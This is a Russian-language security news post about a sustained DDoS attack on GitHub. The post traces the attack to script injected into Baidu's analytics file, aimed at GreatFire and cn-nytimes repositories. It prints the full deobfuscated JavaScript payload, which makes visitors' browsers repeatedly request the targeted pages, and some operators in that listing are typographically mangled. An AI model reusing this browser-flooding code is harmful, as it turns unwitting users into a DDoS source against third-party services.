Технологии безопасности

Сайт посвященный вопросам безопасности

Github вторые сутки держится против DDoS-атаки

Github более 24 часов выдерживает непрерывную DDoS-атаку. О текущем состоянии периодически сообщают в твиттере @GithubStatus и на странице https://status.github.com/.

Сервис уже недоступен для части пользователей. Последнее сообщение в твиттере два часа назад.

Судя по всему, атака имеет китайское происхождение. Есть свидетельства, что некоторым посетителям крупнейшей в Китае поисковой системы Baidu в HTTP-пакеты внедряют посторонний скрипт, который каждые две секунды запрашивает с Github страницы github.com/greatfire/ и github.com/cn-nytimes/.

Вредоносный скрипт — hm.baidu.com/h.js. Он должен быть пустым, но после HTTP-инъекции получает такое содержимое.

Github вторые сутки держится против DDoS-атаки — 1Github вторые сутки держится против DDoS-атаки — 1

Листинг после деобфускации

document.write("<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js">// <![CDATA[
x3c/script>");
!window.jQuery && document.write("<script src=’http://code.jquery.com/jquery-latest.js’>x3c/script>");
startime = (new Date).getTime();
var count = 0;

function unixtime() {
var a = new Date;
return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;

function r_send2() {
var a = unixtime() % NUM;
get(url_array[a])
}

function get(a) {
var b;
$.ajax({
url: a,
dataType: "script",
timeout: 1E4,
cache: !0,
beforeSend: function() {
requestTime = (new Date).getTime()
},
complete: function() {
responseTime = (new Date).getTime();
b = Math.floor(responseTime — requestTime);
3E5 > responseTime — startime && (r_send(b), count += 1)
}
})
}

function r_send(a) {
setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);

Если это действительно так, то DDoS-атака может иметь политический характер и, возможно, ведётся при участии государственных органов с помощью глубокой инспекции трафика. Возможно, власти пытаются затруднить доступ к программным инструментам по вышеуказанным адресам. Это VPN и другие программы для обхода китайской цензуры.

В результате DDoS-атаки страдают и все остальные пользователи Github.

Кстати, администраторы проекта GreatFire ещё неделю назад сообщали о начавшейся DDoS-атаке мощностью примерно 2,6 млрд запросов в час (примерно в 2500 раз выше обычного уровня). Активистам приходится платить $30 000 в день за трафик компании Amazon.